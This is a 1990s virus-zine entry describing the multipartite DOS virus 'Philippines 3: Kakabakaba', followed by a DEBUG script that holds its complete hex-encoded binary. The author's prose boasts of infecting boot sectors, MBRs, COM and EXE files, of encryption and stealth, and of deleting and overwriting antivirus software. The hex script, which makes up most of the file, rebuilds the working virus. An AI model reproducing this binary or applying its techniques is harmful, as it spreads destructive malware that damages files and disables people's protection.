 
  HEX-FILES No. 2                                                   File 016 
 ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ 
 
    Virus Name  : Philippines 3: Kakabakaba
    Author      : Putoksa Kawayan
    Origin      : Manila, Philippines
    Date Written: 1995
 
 
    This is a member of the last group (multipartite group) of the 
    Philippines family. 
 
    The source code of this virii is available but I am withholding it 
    for the time being. However if you want to see the code, you are free 
    to disassemble the virii.
 
 
    Here's a few things about Kakabakaba:
 
    *  Infects boot sector, MBR, COM, EXE and other files. It does not 
       infect EXEs with 0:0 in cs:ip to avoid infecting windows program. 
       But if a windows program is infected, and also a program with 
       internal overlay, it is trashed -- patay na negosyo.
 
    *  Has payload.
 
       If a condition is met (number of files infected), prints 
       "Kakabakaba ka ba?". (Roughly translated to "Are you scared?" or 
       "Are you afraid?" or "Are you nervous?". "Kakabakaba" could mean 
       afraid, nervous, scared, apprehensive, etc. The meaning varies 
       depending on the situation but those given above are good enough.) 
       "ka ba" means "are you".
 
       Displays the swimmer five hours after going resident if it is the 
       right day. Routine is modified from that used by Philippines 1x.
 
    *  Self-modifying, multi-level encryption. 
 
    *  Infects files on 21/4b, 21/3d, 21/43 and 21/56.
 
    *  It does not change target file's entry point. Duwende's way of 
       placing jump to virus is based on that used by this virii. (See 
       HEX-FILES No. 1) For some EXE infection, I pushed it a bit more. 
       This is very dangerous and it is possible to corrupt some EXEs. 
 
    *  Disallows opening of infected files. This would disorient people 
       when copying infected files if the virii is lurking in memory. You 
       would think that something is wrong with your computer or it 
       hanged.
 
    *  Infects disks on 13/02 and 13/03.
 
    *  Virii hides boot sector/mbr infection.
 
    *  Borrowed technique used by DIR-II (aka Creeping Death) to protect 
       sectors used by virii in diskettes from being overwritten. If 
       these sectors are in use, files using those sectors are 
       permanently damaged.
 
    *  Code length is limited to 4096 bytes to be able to infect nine 
       sector/track diskettes (360K) which are still being used in old 
       computers at the time of writing.
 
    *  Might not be able to set-up dos handler if it goes resident 
       through a boot in Windows 95.
 
    *  My virii loves AVs very much it deletes AV checksum data. Also, it 
       would overwrite the AV product so that it would not become a 
       trojan for people like me. If I could not write to AV, I would not 
       allow it to EXEC. 
 
       Note: AVP is spared by Kakabakaba because I was not aware of its 
             existence when I wrote this virus. Be assured that AVP would 
             be included in the VIP list in the next edition so that it 
             won't feel left out of the party.
 
       I am not a cold-hearted person. In fact, I kept the overwriting 
       part to a minimum so that there would still be a way to recover 
       from this. If you are using a good AV and you are using it right, 
       the damage could be reversed. 
 
       Now you would know whether your AV is really good at recovering 
       files and what it is saying all along is true or purely hype. You 
       would also know if you are using your AVs right.
 
       My apologies to publishers of non-av programs which are hit by 
       mistake. My virii determines if program is AV by name. The moral 
       of the story is, thou shalt not use av-like names.
 
    *  This variant of the Philippines virus is not as stable as I would 
       want it to be. Might crash on some EXE infections. I did not try 
       to look for the problem. Maybe some other time....
       Nakakakabakaba talaga!
 
 
    Here's the virii....
 
 
 ÄÄ PHIL4096.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 
 
 N PHIL4096.COM
 E 0100  E9 FD 03 0D 20 20 20 0D 0A 4D 61 62 75 68 61 79 
 E 0110  21 0D 0A 0A 54 68 69 73 20 69 73 20 50 68 69 6C 
 E 0120  69 70 70 69 6E 65 73 2E 34 30 39 36 20 76 69 72 
 E 0130  75 73 20 63 6F 6D 69 6E 67 20 74 6F 20 79 6F 75 
 E 0140  20 66 72 6F 6D 20 74 68 65 20 50 68 69 6C 69 70 
 E 0150  70 69 6E 65 73 2E 0D 0A 42 72 6F 75 67 68 74 20 
 E 0160  74 6F 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48 
 E 0170  45 58 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D 0A 
 E 0180  0A 48 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50 
 E 0190  75 74 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61 
 E 01A0  72 65 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62 
 E 01B0  6C 65 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69 
 E 01C0  6D 70 6C 69 65 64 0D 0A 61 6E 64 2F 6F 72 20 69 
 E 01D0  6D 61 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20 
 E 01E0  62 72 6F 75 67 68 74 20 61 62 6F 75 74 20 62 79 
 E 01F0  20 74 68 65 20 75 73 65 2C 20 6D 69 73 75 73 65 
 E 0200  20 6F 72 20 6E 6F 6E 2D 75 73 65 20 6F 66 0D 0A 
 E 0210  74 68 69 73 20 76 69 72 69 69 2E 20 54 68 65 20 
 E 0220  70 65 72 73 6F 6E 20 77 68 6F 20 65 78 65 63 75 
 E 0230  74 65 73 20 74 68 69 73 20 76 69 72 69 69 20 62 
 E 0240  65 61 72 73 20 66 75 6C 6C 20 72 65 73 70 6F 6E 
 E 0250  73 69 62 69 6C 69 74 79 0D 0A 66 6F 72 20 68 69 
 E 0260  73 2F 68 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A 
 E 0270  0A 54 68 69 73 20 76 69 72 69 69 20 69 73 20 73 
 E 0280  74 72 69 63 74 6C 79 20 66 6F 72 20 65 64 75 63 
 E 0290  61 74 69 6F 6E 61 6C 20 6F 72 20 72 65 73 65 61 
 E 02A0  72 63 68 20 70 75 72 70 6F 73 65 73 20 6F 6E 6C 
 E 02B0  79 2E 0D 0A 0A 24 08 20 1A 20 20 20 20 20 20 20 
 E 02C0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 02D0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 02E0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 02F0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0300  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0310  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0320  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0330  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0340  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0350  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0360  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0370  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0380  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0390  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 03A0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 03B0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 03C0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 03D0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 03E0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 03F0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0400  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0410  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0420  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0430  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0440  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0450  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0460  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0470  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0480  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0490  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 04A0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 04B0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 04C0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 04D0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 04E0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 04F0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0500  8C C5 81 C5 8E 00 55 8E DD 2E C6 06 1E 05 CB BE 
 E 0510  E4 00 8A 1C 80 F3 E9 88 1C 4E 79 F6 46 56 20 20 
 E 0520  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0530  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0540  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0550  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0560  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0570  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0580  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0590  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 05A0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 05B0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 05C0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 05D0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 05E0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 05F0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0600  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0610  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0620  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0630  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0640  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0650  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0660  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0670  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0680  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0690  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 06A0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 06B0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 06C0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 06D0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 06E0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 06F0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0700  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0710  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0720  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0730  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0740  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0750  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0760  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0770  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0780  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0790  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 07A0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 07B0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 07C0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 07D0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 07E0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 07F0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0800  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0810  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0820  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0830  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0840  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0850  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0860  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0870  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0880  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 0890  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 08A0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 08B0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 08C0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
 E 08D0  E9 0E ED 0E FF FF F9 0E FF FF EF 0E FF FF F0 0E 
 E 08E0  13 65 21 67 39 55 F3 E9 56 0F E6 58 EE 62 05 63 
 E 08F0  EA 3B 21 61 EA A6 91 EB 02 1A B7 B1 E0 AF 0B 14 
 E 0900  34 6A 69 B6 4D E9 B4 32 6E 2C 0C AC EB 96 8D AD 
 E 0910  EB CA CC D3 E3 96 0D 53 90 AC EB 96 89 AD EB CA 
 E 0920  CC D3 EA 96 0F 53 90 1C 99 89 69 61 B4 ED E8 33 
 E 0930  9D B7 2F E1 AF 80 2C EA 69 0B 2D EA C1 CF 53 63 
 E 0940  17 0E D2 10 2C EA 70 0B 2A EA C1 CF 53 6A 16 0C 
 E 0950  D3 10 9F 19 17 DA F8 F1 E7 1A 97 1F 4C 4A 1D 37 
 E 0960  BB 7F 04 70 C3 9C CC 81 39 3E 9F 00 FF A6 93 E8 
 E 0970  89 9E A6 8E BC 00 FF A6 FA E8 CC 9E A6 93 D7 C3 
 E 0980  C2 9F 08 FF E8 57 9E A6 7B E8 83 9E A6 9B 3E 5C 
 E 0990  EB 9E 5D E5 9C 94 24 1C 16 CB 9C 8D 7F 9E DA 71 
 E 09A0  39 E8 1C 7D DC E2 F4 26 64 DC E2 CC 26 6D 58 7F 
 E 09B0  49 7E B9 70 F9 FE E4 A6 9F 59 3E 1C DB 16 D8 06 
 E 09C0  39 3E 97 1C 7B D4 E9 94 45 F6 BC E1 97 81 F6 E1 
 E 09D0  EE B0 D7 7E D3 34 19 31 96 B0 CB F5 AD 71 B0 DB 
 E 09E0  87 55 5D 74 FB A5 A3 F4 EA 65 75 A9 75 7D 01 CE 
 E 09F0  8C 17 F7 A5 B8 F7 33 78 D8 F7 AB 53 75 B5 95 71 
 E 0A00  7F C5 F5 17 F7 A5 75 7E 51 78 76 7E AB 37 75 B5 
 E 0A10  EC 71 01 DC F5 17 F7 A5 9C 72 33 78 FB 72 5A 34 
 E 0A20  6C ED 10 B1 0C A8 59 F0 84 A6 A9 77 7D 29 31 F7 
 E 0A30  7F B5 F5 B5 95 71 29 33 0E 01 4A F5 B5 95 71 29 
 E 0A40  0A F0 01 CC F5 F7 29 1A 8F 74 FB A8 7D 75 2C 9A 
 E 0A50  8F 5D 25 20 F3 2A 75 75 D0 4B 71 33 96 72 15 4F 
 E 0A60  92 F5 80 B1 77 F5 96 B0 0D B1 57 72 F5 96 81 7E 
 E 0A70  67 75 F4 F5 09 B0 57 71 67 0C 8B B0 57 F6 B1 96 
 E 0A80  CF 77 B0 57 72 34 15 F5 08 2C 43 78 8D A6 29 75 
 E 0A90  0B 34 19 80 E4 74 6B 0C C5 F0 37 06 4F F5 66 08 
 E 0AA0  EC 72 06 95 01 D4 75 72 6B CE 78 72 07 4F 8E 32 
 E 0AB0  6D 95 10 1D 0C 11 10 19 0A 15 76 62 62 6E 6E 76 
 E 0AC0  20 76 6E 62 76 6E 01 FB 0B 72 15 CE 78 72 07 4F 
 E 0AD0  85 32 17 32 05 10 19 95 D0 92 37 94 CE F7 9D 11 
 E 0AE0  AF CE 8F 81 8D 66 94 95 22 A4 72 7E 95 01 20 8B 
 E 0AF0  7F 86 8B 32 1D 01 23 8B 7F 9A 8B 32 06 B1 1D 95 
 E 0B00  37 A5 50 F4 DD A8 F5 75 DB 72 7E AA F7 75 E5 96 
 E 0B10  45 71 6B F6 50 76 2D F6 06 84 BD 2C 62 F6 AB B7 
 E 0B20  12 B1 75 31 D6 F4 31 D6 8C 31 C6 71 32 55 76 31 
 E 0B30  AD 78 ED 15 B1 00 72 7E 1C 9C 4F 78 0C 12 4F F4 
 E 0B40  2B 55 AD 78 10 85 BD 2C 6D 77 B1 75 31 D6 F3 31 
 E 0B50  BD F8 B1 55 76 31 D6 FA 4F C6 7B B1 4D 77 ED 99 
 E 0B60  D0 00 72 7E E5 9E 4F 79 4B 0A F6 4E FC 6B DD 4F 
 E 0B70  8F 35 0A 78 50 71 AD 78 80 78 AD 77 81 76 32 1A 
 E 0B80  50 75 31 D6 FD 31 D6 79 D0 00 72 7E ED 15 E5 9C 
 E 0B90  45 F6 52 4F F4 55 55 5D 86 86 2C 48 F6 F5 19 32 
 E 0BA0  0B 31 D6 FE 01 FB 8B 31 AD 00 D8 D0 4F FD 49 72 
 E 0BB0  5C D1 77 18 78 52 77 6F 80 7D 18 78 52 77 63 81 
 E 0BC0  8D 18 78 52 77 77 31 68 B0 77 2A E9 75 E5 96 55 
 E 0BD0  D3 A9 75 7D 01 FC 8B ED EE 9D 11 E9 95 4E FC 9D 
 E 0BE0  7F E1 95 8F 1D 35 07 F3 A8 95 4E 77 B1 95 81 77 
 E 0BF0  A8 16 50 09 B0 D6 7D A5 2E 77 01 A7 0C 26 8E F3 
 E 0C00  51 11 F6 E1 F4 34 15 ED 06 B1 0C A8 75 7D 8D A6 
 E 0C10  52 19 01 26 78 01 1D 0C E8 1A F4 E5 96 4F 72 6B 
 E 0C20  8D 50 76 2D F6 9C 05 F5 77 B1 F7 26 59 75 64 26 
 E 0C30  D5 F5 B1 1D 64 31 68 A6 8C 31 68 48 75 01 38 0C 
 E 0C40  5C 5D 75 35 0A 6E 4F F7 22 31 68 3E F5 81 77 64 
 E 0C50  5C 3E F5 35 0C 6E 4F F7 22 31 68 26 F5 81 77 64 
 E 0C60  5C 26 F5 01 B7 0C A5 D2 0B 2C 75 7D AB 33 F3 B1 
 E 0C70  70 2F C4 32 77 62 17 31 0D 54 D3 4F 00 0C 92 CE 
 E 0C80  04 2F BB 32 77 6E 17 31 0D 54 D3 4F 78 0C 90 CE 
 E 0C90  04 81 1B 2C 1E F4 2A 71 6B BD B5 85 F5 9C 85 64 
 E 0CA0  D0 75 A5 E2 75 01 04 8A 22 A5 0E F5 01 8E 8A BD 
 E 0CB0  CC 85 F5 9C 85 64 B1 75 DC E9 75 01 19 8A 64 A5 
 E 0CC0  0B 77 01 61 0C A5 E4 75 E8 AF F3 AB D0 75 B1 12 
 E 0CD0  50 F6 0C 11 31 F6 D7 D1 45 7F 0C 90 CE 0E 32 F6 
 E 0CE0  0A 15 31 F6 D7 D1 4F 78 0A 92 CE 0E 81 05 01 8F 
 E 0CF0  89 67 F4 29 11 15 4F 76 4E 05 31 68 7E 75 64 26 
 E 0D00  2A 77 AC F7 01 BA 8A 66 EB CE 78 66 84 4F 8E 32 
 E 0D10  6D 26 73 75 BC A9 75 7D 68 08 F3 32 F7 1E 15 31 
 E 0D20  8E D1 52 C8 10 2C 07 75 50 77 6F 80 31 77 54 C8 
 E 0D30  86 D9 A8 75 7D ED 1E 01 30 F0 74 FB 74 F7 D8 5A 
 E 0D40  7F D0 F0 01 69 F0 B1 00 0D 7E B1 74 78 7E 01 E9 
 E 0D50  8F ED 90 01 64 F0 01 5F 8F 18 78 20 F3 35 80 60 
 E 0D60  90 E7 EF FF E3 F3 ED 15 CF CB 77 B0 D7 78 34 19 
 E 0D70  ED EE 33 19 64 B0 EF 64 CF D7 76 23 6B 02 4F F3 
 E 0D80  29 64 4F F5 74 FB 95 A2 A9 8B 64 CE 8F B1 6F B1 
 E 0D90  2D 76 33 1A E9 16 4F 03 CF CF 77 B0 DF 78 B1 6F 
 E 0DA0  52 19 81 1D AB D3 DF D7 FA 77 A9 D1 DD D5 B4 77 
 E 0DB0  6A 54 60 58 DB F6 17 EB 08 A1 B1 16 A1 89 95 E6 
 E 0DC0  A5 FE E2 F2 EA FA 2F 5E F1 E4 68 B1 D7 0C 2C 75 
 E 0DD0  13 ED 99 2A 5A D2 AB E1 0C 34 19 69 EF 4F F6 69 
 E 0DE0  96 4F F4 95 B1 D3 F5 E9 F2 CE 7D 5D DC 60 DF 74 
 E 0DF0  9A 55 01 E7 75 DB 5C D8 37 4F 01 64 B0 73 64 B0 
 E 0E00  2D 76 B5 18 77 F5 94 55 80 93 95 99 DD 94 98 DC 
 E 0E10  6C 1A 5E 18 1C 60 97 9B B6 96 9A DE 34 15 2C 0C 
 E 0E20  8F B1 0C A8 65 75 8D 28 C5 7F 2C 33 78 B1 0C AC 
 E 0E30  50 8D 28 CE F0 2C 31 F7 D0 0C AC 7D 8D 28 95 67 
 E 0E40  25 7F 63 73 6B 7B 03 04 00 82 80 83 81 17 18 16 
 E 0E50  ED 94 97 95 0F 10 0E 8E 83 8F 8D 0A ED 15 34 1D 
 E 0E60  69 75 4B 00 F7 B1 1B 35 EE 76 AB 21 F6 A8 75 75 
 E 0E70  68 75 75 35 06 35 89 29 8F 76 92 FD CD 78 ED 15 
 E 0E80  F1 FD 81 8D F5 89 8B 87 0E FB 29 75 7D B1 8D B1 
 E 0E90  09 A8 75 F4 78 DF F5 0D 09 8D A6 32 8E AA 35 76 
 E 0EA0  DB FD 77 E9 96 4F FC BE A1 F0 75 01 B0 75 4F 66 
 E 0EB0  D0 96 01 36 75 4F F9 BE A1 F0 75 A5 FD 77 AC 78 
 E 0EC0  F4 05 5D B1 8D ED 8B 34 6B A8 59 F0 8D A6 29 8D 
 E 0ED0  8D 5D 91 74 D9 29 0A 64 52 99 B1 80 6A 68 6D 72 
 E 0EE0  C5 F5 01 1E F0 6A 78 75 0B CE F5 01 90 F5 18 78 
 E 0EF0  92 7E F6 B0 74 72 7E 17 2E 53 A5 75 7E 33 78 76 
 E 0F00  14 AB 65 75 17 F5 A5 B8 8E 33 78 B9 F7 34 94 29 
 E 0F10  4F F7 0A A1 B1 95 A1 31 12 6C F7 29 33 78 AB 53 
 E 0F20  0B A1 BD A1 89 ED 9C CE DF D4 B1 1B 29 F4 76 35 
 E 0F30  EE F5 2E 35 92 FD 91 B1 84 AC 78 9D 05 34 15 29 
 E 0F40  51 78 A8 32 75 B1 09 F5 03 8D 28 95 74 FB 2A F7 
 E 0F50  8B 2F F0 92 E4 2F 53 92 9B 65 65 65 65 65 65 65 
 E 0F60  1B 65 65 65 65 65 65 65 1B 65 65 65 3B B5 88 F4 
 E 0F70  C5 79 35 0A 35 4F F6 35 08 76 CF 74 72 10 CE 72 
 E 0F80  4B 0B 76 4F F1 35 0B F5 45 78 BA 64 8B 64 75 7E 
 E 0F90  33 DC 5E 60 DF 7C 78 DD B5 B1 03 74 FB 74 F7 A9 
 E 0FA0  0B 7D 2C F5 75 29 F4 76 7F 65 F5 CD 71 54 49 E9 
 E 0FB0  7F 00 F5 81 0D 2C C9 F6 E3 FD B1 89 35 0A 35 4F 
 E 0FC0  94 35 CA 79 F0 4E 67 B1 8D 6B 81 CE 7C 32 17 39 
 E 0FD0  2B 55 F5 09 DF 0B 8D 28 C5 F0 A7 28 CE F6 A7 AC 
 E 0FE0  95 8D 28 DB 4F 7D 01 D0 0F CD F1 DA D9 F7 FB DB 
 E 0FF0  3A 5A D8 59 81 3F B1 D2 94 32 CE FF 35 94 71 17 
 E 1000  3A 76 2C F5 75 B1 58 7D 7F 15 76 CD 71 54 49 F6 
 E 1010  7F 30 76 81 0D B0 58 7D 59 59 B0 58 7E 81 6B A4 
 E 1020  10 7E EA 75 F4 4E 6F ED 6B AB 37 75 34 19 96 EE 
 E 1030  4B 6B 91 4F 68 33 1A B5 08 4D 4F FB 35 0C 0D CD 
 E 1040  18 74 FB B0 00 FB 72 B0 26 E5 72 34 15 29 0C F0 
 E 1050  08 A1 33 11 A1 18 78 6C 8E 6B 89 DA D9 F7 FB DB 
 E 1060  3A 5A D8 59 BA 12 76 75 33 3B 64 8B 78 72 7E 4F 
 E 1070  11 59 35 07 0C 5D BA 59 00 A6 0C 75 0D 64 0C 74 
 E 1080  92 7E CE 82 DC 5E 2F 77 F1 7A F1 1E CE F5 56 81 
 E 1090  8E 6E 20 CE F5 35 08 F4 38 D8 CE 9E 74 FB 01 78 
 E 10A0  0C 92 FD 4E E9 1A 45 30 09 5C 0D 04 1A 50 16 3C 
 E 10B0  09 1A 45 4B 0B 15 5C 25 02 0E 21 35 7F 09 4E 55 
 E 10C0  31 8B D7 F4 F4 ED 0D 92 22 53 0C ED 0D CE F5 77 
 E 10D0  31 09 ED 0D DE 76 6C 18 00 0D 04 34 10 54 75 76 
 E 10E0  28 18 12 25 04 B2 1A 53 0A ED 0D FE FA 95 95 9D 
 E 10F0  F4 9D AC 95 95 75 19 BA F6 93 97 97 91 05 2D B1 
 E 1100  51 BC BE B2 BB 05 AE BB CF BB B7 BB 3E D7 8C 75 
 E 1110  2F 35 8F 2D 51 8D 09 2D 2F 35 8F 2D 79 2D 75 7C 
 E 1120  93 D3 8A 51 2A 8F 2D 51 8A 8F 2D 51 DC 09 2D 79 
 E 1130  EC 75 7C FC D3 8A 51 11 86 2D 51 07 8F 2D 51 56 
 E 1140  07 2D 79 20 75 7C FC D3 89 51 38 8F 2D 51 07 8F 
 E 1150  63 51 C8 8F 2D 79 80 75 1A FC D3 8A 51 D0 09 2D 
 E 1160  2F 8B 8F 2D 51 94 8F 2D 17 0B 75 7C FC FE 46 21 
 E 1170  B9 09 04 79 9C 75 A4 79 C5 75 79 29 75 A4 79 4B 
 E 1180  0B 79 AC 75 A4 79 B5 75 17 7C 75 F4 1A 09 04 05 
 E 1190  7B 05 05 05 05 9C 75 05 7B 05 05 05 9C 75 27 05 
 E 11A0  7B 05 05 9C 75 CE E9 CE 23 45 0D 04 72 7B 0C 6C 
 E 11B0  4B 63 75 E3 65 CE 7D 53 0A ED 0D 1A CE 0B 50 67 
 E 11C0  68 2A A3 FE 33 CE E9 76 29 18 1A 25 04 34 61 53 
 E 11D0  0B FE 63 CE E9 76 6B 18 78 25 04 34 00 53 8B FE 
 E 11E0  28 95 95 9D 9D 9D AC 05 0B AD BB 3E BF 3F BB 1F 
 E 11F0  7B 2D 39 BF 3F BF 3D 3D D6 3E B9 B2 05 9D 9D 9D 
 E 1200  E3 75 79 9F 75 2A 1A 50 7D 35 EE 8C 35 FA B4 2A 
 E 1210  46 89 A8 10 55 B1 FE EA F3 05 05 05 05 27 75 05 
 E 1220  7B 05 05 05 27 75 05 05 7B 05 05 05 27 75 A3 17 
 E 1230  7B B1 0A 1A CE 2B 76 50 1D 53 8F D7 8B 75 ED 0D 
 E 1240  0C 6C 18 02 0D 04 34 0F 32 75 76 6A 18 12 25 04 
 E 1250  52 0C 52 75 53 0C ED 0D DE EA 9C 05 05 9C 05 75 
 E 1260  7B 05 05 05 05 05 75 27 7B 05 27 05 75 C1 15 18 
 E 1270  08 0D 04 34 0F 5D 75 76 29 18 1A 25 04 34 0C 53 
 E 1280  0B C1 A3 92 EF 58 8A 75 1A 76 30 B1 F6 A7 EA 7C 
 E 1290  12 FB 5D DC 5E DF DE AB 23 72 A8 F9 F6 01 7B 78 
 E 12A0  B9 DB 5A D8 59 FB 95 AB EB F7 A8 04 F4 32 F6 10 
 E 12B0  77 31 F6 D7 06 8F 95 7C 80 19 78 FB 29 75 75 34 
 E 12C0  73 2B 75 75 02 75 77 75 0B ED 15 3B 74 01 A9 0B 
 E 12D0  EC 32 F6 6E 17 31 F6 D7 7C 8F AB 73 75 93 3B 5D 
 E 12E0  50 17 6B D1 4F E7 6B EA 45 E5 6B D5 4F FB 6B 60 
 E 12F0  45 F9 59 64 A5 E7 72 81 8D 01 BD 8B 81 8E 29 FC 
 E 1300  0B 5D 29 09 55 5D 29 75 2C 93 3B 81 08 01 CB 8B 
 E 1310  A7 AE 94 79 D3 8B EA FF D6 81 62 46 91 E8 BF EC 
 E 1320  EB 79 BF C5 95 32 0C 01 94 A5 D9 1A 70 7A 5B 50 
 E 1330  49 50 CE 50 4B 50 CE 50 A6 4B 50 EF CE 50 61 7A 
 E 1340  99 FF F0 FC D7 58 D6 57 AB 55 56 A3 ED 66 8B 71 
 E 1350  15 FC 57 F0 D6 F8 71 A2 64 FA 8B E5 7F F0 7D D2 
 E 1360  0F 8B 30 7F C6 F7 8B F1 94 C6 7B A3 FF 62 8B 01 
 E 1370  95 C6 7F 8B CC FF D2 71 8A F4 7F 52 51 D0 53 D2 
 E 1380  32 D3 7D 71 1F A7 FF 19 59 C9 F5 3B DD F4 63 1E 
 E 1390  3C FD DB C6 77 DF BF 81 7F 46 F9 05 93 28 FD 17 
 E 13A0  86 6B 8B C6 7F 67 9F 83 75 D3 AF 94 79 ED BF C5 
 E 13B0  6D A5 69 8B A2 FE FC 57 97 7D A0 3D F9 3B E0 FB 
